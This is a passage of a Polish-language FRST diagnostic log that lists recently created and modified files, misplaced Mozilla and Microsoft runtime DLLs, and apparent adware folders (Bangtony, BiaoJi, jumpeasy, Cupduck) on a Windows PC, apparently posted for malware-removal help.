C:\Users\MAGDA\Downloads\Shortcut-Cleaner-39923-AsystentPobierania_3000424992.exe 2017-05-29 10:13 - 2017-05-29 10:13 - 00380928 _____ C:\Users\MAGDA\Downloads\xshexl47.exe 2017-05-29 10:09 - 2017-05-29 10:09 - 00380928 _____ C:\Users\MAGDA\Downloads\51m9uub4.exe 2017-05-29 09:44 - 2017-05-29 11:54 - 00000000 ____D C:\FRST 2017-05-29 09:44 - 2017-05-29 09:44 - 02429952 _____ (Farbar) C:\Users\MAGDA\Downloads\FRST64.exe 2017-05-29 09:44 - 2017-05-29 09:44 - 00000223 _____ C:\Users\MAGDA\Downloads\Search.txt 2017-05-29 09:10 - 2017-05-29 09:10 - 00000000 ____D C:\Users\PRACOWNICY\Desktop\Stare dane programu Firefox 2017-05-29 09:09 - 2017-05-29 09:10 - 00000000 ____D C:\Users\PRACOWNICY\AppData\LocalLow\Mozilla 2017-05-29 09:07 - 2017-05-29 09:07 - 00000000 ____D C:\Windows\SysWOW64\extensions 2017-05-29 09:06 - 2017-05-29 09:06 - 00000000 ____D C:\Program Files (x86)\Bangtony 2017-05-29 09:05 - 2017-05-29 09:05 - 00000000 ___RD C:\Users\PRACOWNICY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices 2017-05-29 09:05 - 2017-05-29 09:05 - 00000000 ____D C:\Users\PRACOWNICY\AppData\Roaming\Comarch 2017-05-29 09:05 - 2017-05-29 09:05 - 00000000 ____D C:\Users\PRACOWNICY\AppData\Local\CEF 2017-05-29 07:34 - 2017-05-29 07:34 - 00917184 _____ (Microsoft Corporation) C:\Users\MAGDA\ucrtbase.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00440120 _____ (Microsoft Corporation) C:\Users\MAGDA\msvcp140.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00227856 _____ C:\Users\MAGDA\blocklist.xml 2017-05-29 07:34 - 2017-05-29 07:34 - 00099784 _____ (Mozilla Foundation) C:\Users\MAGDA\wow_helper.exe 2017-05-29 07:34 - 2017-05-29 07:34 - 00083784 _____ (Microsoft Corporation) C:\Users\MAGDA\vcruntime140.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00072896 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-private-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00031176 _____ (Mozilla Corporation) C:\Users\MAGDA\plugin-hang-ui.exe 2017-05-29 07:34 - 2017-05-29 07:34 - 00028864 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-math-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00027080 _____ (Mozilla Foundation) C:\Users\MAGDA\AccessibleMarshal.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00025792 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-multibyte-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00024256 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-string-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00024256 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-stdio-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00022720 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-runtime-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00022208 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-convert-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00021696 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-file-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00020672 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-time-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00020672 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-localization-l1-2-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00020160 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-filesystem-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00020160 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-synch-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00020160 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-processthreads-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00019136 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-process-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00019136 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-conio-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00019136 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-sysinfo-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00019136 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-processenvironment-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018624 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-utility-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018624 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-locale-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018624 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-heap-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018624 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-crt-environment-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018624 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-synch-l1-2-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018624 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-processthreads-l1-1-1.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018624 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-memory-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018624 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-libraryloader-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018624 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-console-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018112 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-util-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018112 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-timezone-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018112 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-string-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018112 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-namedpipe-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018112 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-heap-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018112 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-handle-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018112 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-file-l2-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018112 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-file-l1-2-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018104 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-interlocked-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00018104 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-errorhandling-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00017600 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-rtlsupport-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00017600 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-profile-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00017600 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-debug-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00017600 _____ (Microsoft Corporation) C:\Users\MAGDA\api-ms-win-core-datetime-l1-1-0.dll 2017-05-29 07:34 - 2017-05-29 07:34 - 00000327 _____ C:\Users\MAGDA\thunderbird.VisualElementsManifest.xml 2017-05-29 07:34 - 2017-05-29 07:34 - 00000000 ____D C:\Users\MAGDA\VisualElements 2017-05-29 07:34 - 2017-05-29 07:34 - 00000000 ____D C:\Users\MAGDA\chrome 2017-05-29 07:34 - 2017-05-29 07:34 - 00000000 _____ C:\Users\MAGDA\chrome.manifest 2017-05-29 07:23 - 2017-05-29 07:23 - 00000000 ____D C:\Program Files (x86)\592BB039_jumpeasy 2017-05-29 07:14 - 2017-05-29 07:19 - 00000000 ____D C:\Program Files (x86)\BiaoJi 2017-05-25 14:44 - 2017-05-25 14:44 - 17847152 _____ (Comarch) C:\Users\MAGDA\Downloads\ComarchCryptoProvider(2).exe 2017-05-25 07:26 - 2017-05-29 09:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2017-05-25 07:26 - 2017-05-29 08:57 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2017-05-25 07:25 - 2017-05-25 07:25 - 00246200 _____ (Mozilla) C:\Users\MAGDA\Downloads\Firefox Setup Stub 53.0.3 (1).exe 2017-05-24 13:45 - 2017-05-24 13:45 - 00000000 ____D C:\Users\MAGDA\AppData\Local\Firefox 2017-05-24 13:44 - 2017-05-29 09:07 - 00002086 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2017-05-24 13:44 - 2017-05-24 13:44 - 00000000 ____D C:\Users\Public\Documents\Google 2017-05-24 13:44 - 2017-05-24 13:44 - 00000000 ____D C:\Users\MAGDA\AppData\Local\Setleaf 2017-05-24 13:27 - 2017-05-29 11:48 - 00000000 _____ C:\Users\Public\Documents\report.dat 2017-05-24 10:28 - 2015-07-01 22:49 - 00260096 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll 2017-05-24 10:28 - 2015-07-01 22:48 - 00102912 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll 2017-05-24 10:28 - 2015-07-01 22:30 - 00206848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WebClnt.dll 2017-05-24 10:28 - 2015-07-01 22:30 - 00082432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\davclnt.dll 2017-05-24 10:02 - 2017-05-29 11:47 - 00000000 _____ C:\Users\Public\Documents\temp.dat 2017-05-24 10:02 - 2017-05-24 10:02 - 00246200 _____ (Mozilla) C:\Users\MAGDA\Downloads\Firefox Setup Stub 53.0.3.exe 2017-05-24 08:20 - 2017-05-24 08:20 - 00000000 ____D C:\Users\MAGDA\AppData\Local\Cupduck 2017-05-18 07:23 - 2017-05-18 07:23 - 00246264 _____ (Mozilla) C:\Users\MAGDA\Downloads\Firefox Setup Stub 53.0.2.exe 2017-05-17 14:24 - 2017-05-17 14:24 - 00002962 _____ C:\Windows\System32\Tasks\{63DB8AF4-0978-4CF0-854D-32EBFD1EC056} ==================== Jeden miesiąc - zmodyfikowane pliki i foldery ======== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2017-05-29 11:53 - 2016-11-21 08:53 - 00000000 ____D C:\Users\MAGDA\AppData\LocalLow\Mozilla 2017-05-29 11:53 - 2009-07-14 06:45 - 00023232 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2017-05-29 11:53 - 2009-07-14 06:45 - 00023232 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2017-05-29 11:47 - 2014-04-17 08:17 - 00001928 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2017-05-29 11:46 - 2014-04-16 11:44 - 00003978 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{6650F2B1-F264-47AE-8B14-3750C7405B88} 2017-05-29 11:42 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2017-05-29 11:20 - 2014-04-16 11:10 - 00000000 ____D C:\Users\MAGDA\AppData\Local\CrashDumps 2017-05-29 11:11 - 2016-01-19 11:56 - 00000000 ____D C:\ProgramData\MFAData 2017-05-29 09:39 - 2016-07-27 07:22 - 00000000 ___HD C:\Users\MAGDA\Desktop\MAGDA iPhone 2017-05-29 09:06 - 2017-03-10 12:39 - 00000000 ____D C:\ProgramData\Package Cache 2017-05-29 09:05 - 2015-05-18 14:17 - 00001258 __RSH C:\Users\PRACOWNICY\ntuser.pol 2017-05-29 09:05 - 2015-05-18 14:17 - 00000000 ____D C:\Users\PRACOWNICY 2017-05-29 08:58 - 2014-04-03 12:28 - 00000000 ____D C:\Users\MAGDA 2017-05-29 07:35 - 2014-04-18 11:58 - 00000000 ____D C:\Users\MAGDA\uninstall 2017-05-29 07:34 - 2016-05-17 07:58 - 00133064 _____ (Mozilla Foundation) C:\Users\MAGDA\ldap60.dll 2017-05-29 07:34 - 2016-05-17 07:58 - 00056264 _____ (Mozilla Foundation) C:\Users\MAGDA\lgpllibs.dll 2017-05-29 07:34 - 2016-05-17 07:58 - 00024520 _____ (Mozilla Foundation) C:\Users\MAGDA\prldap60.dll 2017-05-29 07:34 - 2016-05-17 07:58 - 00020936 _____ (Mozilla Foundation) C:\Users\MAGDA\ldif60.dll 2017-05-29 07:34 - 2016-04-06 07:23 - 03747512 _____ (Microsoft Corporation) C:\Users\MAGDA\d3dcompiler_47.dll 2017-05-29 07:34 - 2016-04-06 07:23 - 02106216 _____ (Microsoft Corporation) C:\Users\MAGDA\D3DCompiler_43.dll 2017-05-29 07:34 - 2016-04-06 07:23 - 00120264 _____ (Mozilla Foundation) C:\Users\MAGDA\crashreporter.exe 2017-05-29 07:34 - 2016-04-06 07:23 - 00118216 _____ (Mozilla Foundation) C:\Users\MAGDA\breakpadinjector.dll 2017-05-29 07:34 - 2016-04-06 07:23 - 00025032 _____ (Mozilla Foundation) C:\Users\MAGDA\WSEnable.exe 2017-05-29 07:34 - 2016-04-06 07:23 - 00020424 _____ (Mozilla.org) C:\Users\MAGDA\MapiProxy.dll 2017-05-29 07:34 - 2016-04-06 07:23 - 00004009 _____ C:\Users\MAGDA\crashreporter.ini 2017-05-29 07:34 - 2016-04-06 07:23 - 00000639 _____ C:\Users\MAGDA\application.ini 2017-05-29 07:34 - 2016-04-06 07:23 - 00000520 _____ C:\Users\MAGDA\dependentlibs.list 2017-05-29 07:34 - 2015-08-25 08:20 - 01456584 _____ (Mozilla Foundation) C:\Users\MAGDA\libGLESv2.dll 2017-05-29 07:34 - 2015-08-25 08:20 - 00360392 _____ (Mozilla Foundation) C:\Users\MAGDA\freebl3.dll 2017-05-29 07:34 - 2015-08-25 08:20 - 00175048 _____ (Mozilla Foundation) C:\Users\MAGDA\maintenanceservice.exe 2017-05-29 07:34 - 2015-08-25 08:20 - 00025032 _____ (Mozilla Foundation) C:\Users\MAGDA\libEGL.dll 2017-05-29 07:34 - 2015-08-25 08:20 - 00005936 _____ C:\Users\MAGDA\voucher.bin 2017-05-29 07:34 - 2015-08-25 08:20 - 00000899 _____ C:\Users\MAGDA\freebl3.chk 2017-05-29 07:34 - 2014-04-18 11:58 - 55847880 _____ (Mozilla Foundation) C:\Users\MAGDA\xul.dll 2017-05-29 07:34 - 2014-04-18 11:58 - 18739057 _____ C:\Users\MAGDA\omni.ja 2017-05-29 07:34 - 2014-04-18 11:58 - 01217480 _____ (Mozilla Foundation) C:\Users\MAGDA\nss3.dll 2017-05-29 07:34 - 2014-04-18 11:58 - 00601544 _____ (Mozilla Corporation) C:\Users\MAGDA\thunderbird.exe 2017-05-29 07:34 - 2014-04-18 11:58 - 00413128 _____ (Mozilla Foundation) C:\Users\MAGDA\nssckbi.dll 2017-05-29 07:34 - 2014-04-18 11:58 - 00325576 _____ (Mozilla Foundation) C:\Users\MAGDA\updater.exe 2017-05-29 07:34 - 2014-04-18 11:58 - 00165808 _____ (Mozilla Corporation) C:\Users\MAGDA\maintenanceservice_installer.exe 2017-05-29 07:34 - 2014-04-18 11:58 - 00161224 _____ (Mozilla Corporation) C:\Users\MAGDA\plugin-container.exe 2017-05-29 07:34 - 2014-04-18 11:58 - 00149448 _____ (Mozilla Foundation) C:\Users\MAGDA\softokn3.dll 2017-05-29 07:34 - 2014-04-18 11:58 - 00114632 _____ (Mozilla Foundation) C:\Users\MAGDA\mozglue.dll 2017-05-29 07:34 - 2014-04-18 11:58 - 00096200 _____ (Mozilla Foundation) C:\Users\MAGDA\nssdbm3.dll 2017-05-29 07:34 - 2014-04-18 11:58 - 00084936 _____ (Mozilla.org) C:\Users\MAGDA\mozMapi32_InUse.dll 2017-05-29 07:34 - 2014-04-18 11:58 - 00084936 _____ (Mozilla.org) C:\Users\MAGDA\mozMapi32.dll 2017-05-29 07:34 - 2014-04-18 11:58 - 00020424 _____ (Mozilla.org) C:\Users\MAGDA\MapiProxy_InUse.dll 2017-05-29 07:34 - 2014-04-18 11:58 - 00019405 _____ C:\Users\MAGDA\removed-files 2017-05-29 07:34 - 2014-04-18 11:58 - 00003808 _____ C:\Users\MAGDA\precomplete 2017-05-29 07:34 - 2014-04-18 11:58 - 00001084 _____ C:\Users\MAGDA\updater.ini 2017-05-29 07:34 - 2014-04-18 11:58 - 00000899 _____ C:\Users\MAGDA\softokn3.chk 2017-05-29 07:34 - 2014-04-18 11:58 - 00000899 _____ C:\Users\MAGDA\nssdbm3.chk 2017-05-29 07:34 - 2014-04-18 11:58 - 00000161 _____ C:\Users\MAGDA\platform.ini 2017-05-29 07:34 - 2014-04-18 11:58 - 00000000 ____D C:\Users\MAGDA\isp 2017-05-29 07:34 - 2014-04-18 11:58 - 00000000 ____D C:\Users\MAGDA\extensions 2017-05-29 07:34 - 2014-04-18 11:58 - 00000000 ____D C:\Users\MAGDA\dictionaries 2017-05-29 07:08 - 2016-09-21 11:12 - 00003600 _____ C:\Windows\System32\Tasks\AVG EUpdate Task 2017-05-26 07:38 - 2014-04-16 10:25 - 00000000 ____D C:\Users\MAGDA\Documents\Bluetooth Folder 2017-05-26 07:24 - 2009-07-14 19:55 - 00743832 _____ C:\Windows\system32\perfh015.dat 2017-05-26 07:24 - 2009-07-14 19:55 - 00157282 _____ C:\Windows\system32\perfc015.dat 2017-05-26 07:24 - 2009-07-14 07:13 - 01678514 _____ C:\Windows\system32\PerfStringBackup.INI 2017-05-26 07:24 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\inf 2017-05-24 14:57 - 2015-06-29 09:43 - 00000000 ____D C:\AdwCleaner 2017-05-24 09:26 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF 2017-05-17 14:41 - 2017-04-26 13:30 - 00000000 ____D C:\Windows\system32\log 2017-05-17 14:31 - 2015-03-10 13:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2017-05-17 14:31 - 2015-03-10 13:07 - 00000000 ____D C:\Program Files (x86)\Java 2017-05-17 14:30 - 2015-03-10 13:08 - 00097856 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll 2017-05-17 14:25 - 2014-04-16 11:54 - 00000000 ____D C:\Users\MAGDA\AppData\Local\ElevatedDiagnostics 2017-05-11 11:10 - 2014-04-16 15:11 - 00803320 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2017-05-11 11:10 - 2014-04-16 15:11 - 00144888 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2017-05-11 11:10 - 2014-04-16 15:11 - 00004412 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater 2017-05-11 11:10 - 2014-04-16 15:10 - 00000000 ____D C:\Windows\SysWOW64\Macromed 2017-05-11 11:10 - 2014-04-16 15:10 - 00000000 ____D C:\Windows\system32\Macromed 2017-05-09 09:59 - 2014-09-29 09:24 - 00002100 _____ C:\Users\MAGDA\Desktop\SYMFONIA.lnk 2017-05-08 07:25 - 2015-01-07 09:39 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task ==================== Pliki w katalogu głównym wybranych folderów ======= 2014-04-17 15:26 - 2014-04-17 15:26 - 0007596 _____ () C:\Users\MAGDA\AppData\Local\Resmon.ResmonCfg 2016-04-19 10:39 - 2016-04-19 10:39 - 0003224 _____ () C:\Users\MAGDA\AppData\Local\unins000.dat 2016-04-19 10:39 - 2016-04-19 10:38 - 0711640 _____ () C:\Users\MAGDA\AppData\Local\unins000.exe 2016-04-19 10:39 - 2016-04-19 10:39 - 0011761 _____ () C:\Users\MAGDA\AppData\Local\unins000.msg 2014-04-16 11:08 - 2014-04-16 11:09 - 0002847 _____ () C:\Users\MAGDA\AppData\Local\WiDiSetupLog.20140416.110832.txt 2014-04-16 12:34 - 2014-04-16 12:34 - 0002849 _____ () C:\Users\MAGDA\AppData\Local\WiDiSetupLog.20140416.123441.txt 2014-09-26 15:57 - 2015-09-07 10:11 - 0426792 _____ (ForensiT Limited) C:\ProgramData\UserProfileMigrationService.exe Pliki do przeniesienia lub usunięcia: ==================== C:\ProgramData\UserProfileMigrationService.exe C:\Users\MAGDA\AccessibleMarshal.dll C:\Users\MAGDA\api-ms-win-core-console-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-datetime-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-debug-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-errorhandling-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-file-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-file-l1-2-0.dll C:\Users\MAGDA\api-ms-win-core-file-l2-1-0.dll C:\Users\MAGDA\api-ms-win-core-handle-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-heap-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-interlocked-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-libraryloader-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-localization-l1-2-0.dll C:\Users\MAGDA\api-ms-win-core-memory-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-namedpipe-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-processenvironment-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-processthreads-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-processthreads-l1-1-1.dll C:\Users\MAGDA\api-ms-win-core-profile-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-rtlsupport-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-string-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-synch-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-synch-l1-2-0.dll C:\Users\MAGDA\api-ms-win-core-sysinfo-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-timezone-l1-1-0.dll C:\Users\MAGDA\api-ms-win-core-util-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-conio-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-convert-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-environment-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-filesystem-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-heap-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-locale-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-math-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-multibyte-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-private-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-process-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-runtime-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-stdio-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-string-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-time-l1-1-0.dll C:\Users\MAGDA\api-ms-win-crt-utility-l1-1-0.dll C:\Users\MAGDA\breakpadinjector.dll C:\Users\MAGDA\crashreporter.exe C:\Users\MAGDA\D3DCompiler_43.dll C:\Users\MAGDA\d3dcompiler_47.dll C:\Users\MAGDA\freebl3.dll C:\Users\MAGDA\ldap60.dll C:\Users\MAGDA\ldif60.dll C:\Users\MAGDA\lgpllibs.dll C:\Users\MAGDA\libEGL.dll C:\Users\MAGDA\libGLESv2.dll C:\Users\MAGDA\maintenanceservice.exe C:\Users\MAGDA\maintenanceservice_installer.exe C:\Users\MAGDA\MapiProxy.dll C:\Users\MAGDA\MapiProxy_InUse.dll C:\Users\MAGDA\mozglue.dll C:\Users\MAGDA\mozMapi32.dll C:\Users\MAGDA\mozMapi32_InUse.dll C:\Users\MAGDA\msvcp140.dll C:\Users\MAGDA\nss3.dll C:\Users\MAGDA\nssckbi.dll C:\Users\MAGDA\nssdbm3.dll C:\Users\MAGDA\plugin-container.exe C:\Users\MAGDA\plugin-hang-ui.exe C:\Users\MAGDA\prldap60.dll C:\Users\MAGDA\softokn3.dll C:\Users\MAGDA\thunderbird.exe C:\Users\MAGDA\ucrtbase.dll C:\Users\MAGDA\updater.exe C:\Users\MAGDA\vcruntime140.dll C:\Users\MAGDA\wow_helper.exe C:\Users\MAGDA\WSEnable.exe C:\Users\MAGDA\xul.dll Niektóre pliki w TEMP: ==================== 2016-01-20 13:45 - 2015-11-12 17:54 - 0091048 _____ (AVG Technologies CZ, s.r.o.) C:\Users\MAGDA\AppData\Local\Temp\avguirn_081650008258.exe 2016-02-24 09:32 - 2016-01-12 17:23 - 0179624 _____ (AVG Technologies CZ, s.r.o.) C:\Users\MAGDA\AppData\Local\Temp\avguirn_081688645717.exe 2016-07-27 09:44 - 2016-06-21 18:49 - 0186640 _____ (AVG Technologies CZ, s.r.o.) C:\Users\MAGDA\AppData\Local\Temp\avguirn_081721091260.exe 2016-04-19 08:15 - 2016-03-23 16:57 - 0186640 _____ (AVG Technologies CZ, s.r.o.) C:\Users\MAGDA\AppData\Local\Temp\avguirn_081810207358.exe 2016-04-08 11:38 - 2016-02-18 13:09 - 0179624 _____ (AVG Technologies CZ, s.r.o.) C:\Users\MAGDA\AppData\Local\Temp\avguirn_081997248729.exe 2016-08-23 07:55 - 2016-07-20 14:01 - 0186640 _____ (AVG Technologies CZ, s.r.o.) C:\Users\MAGDA\AppData\Local\Temp\avguirn_082085078362.exe 2016-06-01 09:09 - 2016-04-22 10:01 - 0186640 _____ (AVG Technologies CZ, s.r.o.) C:\Users\MAGDA\AppData\Local\Temp\avguirn_08582552812.exe 2014-04-17 14:16 - 2014-04-17 14:17 - 17929904 _____ (Adobe Systems Incorporated) C:\Users\MAGDA\AppData\Local\Temp\fp_pl_pfs_installer.exe 2017-04-27 09:53 - 2017-04-27 09:53 - 3958296 _____ (Geek Unіnstaller) C:\Users\MAGDA\AppData\Local\Temp\geek64.exe 2014-04-16 12:37 - 2003-05-02 15:13 - 0151552 _____ () C:\Users\MAGDA\AppData\Local\Temp\GLF1644.EXE 2014-04-16 11:07 - 2003-05-02 15:13 - 0151552 _____ () C:\Users\MAGDA\AppData\Local\Temp\GLF1C9B.EXE 2014-04-16 10:25 - 2010-06-20 23:42 - 0046456 _____ (Sony Electronics, Inc) C:\Users\MAGDA\AppData\Local\Temp\GLF32A9.EXE 2014-04-16 10:25 - 2003-05-02 16:13 - 0151552 _____ () C:\Users\MAGDA\AppData\Local\Temp\GLF4253.EXE 2014-04-16 11:01 - 2010-06-20 22:42 - 0046456 _____ (Sony Electronics, Inc) C:\Users\MAGDA\AppData\Local\Temp\GLF4677.EXE 2014-04-16 11:01 - 2003-05-02 15:13 - 0151552 _____ () C:\Users\MAGDA\AppData\Local\Temp\GLF5C49.EXE 2014-04-16 11:07 - 2010-06-20 22:42 - 0046456 _____ (Sony Electronics, Inc) C:\Users\MAGDA\AppData\Local\Temp\GLF745.EXE 2014-04-16 11:16 - 2010-06-20 22:42 - 0046456 _____ (Sony Electronics, Inc) C:\Users\MAGDA\AppData\Local\Temp\GLF79C6.EXE 2014-04-16 12:29 - 2003-05-02 16:13 - 0151552 _____ () C:\Users\MAGDA\AppData\Local\Temp\GLF7B3.EXE 2014-04-16 11:16 - 2003-05-02 15:13 - 0151552 _____ () C:\Users\MAGDA\AppData\Local\Temp\GLF7CB4.EXE 2014-04-16 10:46 - 2010-06-20 22:42 - 0046456 _____ (Sony Electronics, Inc) C:\Users\MAGDA\AppData\Local\Temp\GLF81B2.EXE 2014-04-16 10:12 - 2010-06-20 22:42 - 0046456 _____ (Sony Electronics, Inc) C:\Users\MAGDA\AppData\Local\Temp\GLF88C4.EXE 2014-04-16 11:12 - 2010-06-20 23:42 - 0046456 _____ (Sony Electronics, Inc) C:\Users\MAGDA\AppData\Local\Temp\GLF9919.EXE 2014-04-16 10:46 - 2003-05-02 15:13 - 0151552 _____ () C:\Users\MAGDA\AppData\Local\Temp\GLF9CE0.EXE 2014-04-16 10:42 - 2010-06-20 23:42 - 0046456 _____ (Sony Electronics, Inc) C:\Users\MAGDA\AppData\Local\Temp\GLF9DBA.EXE 2014-04-16 10:12 - 2003-05-02 15:13 - 0151552 _____ () 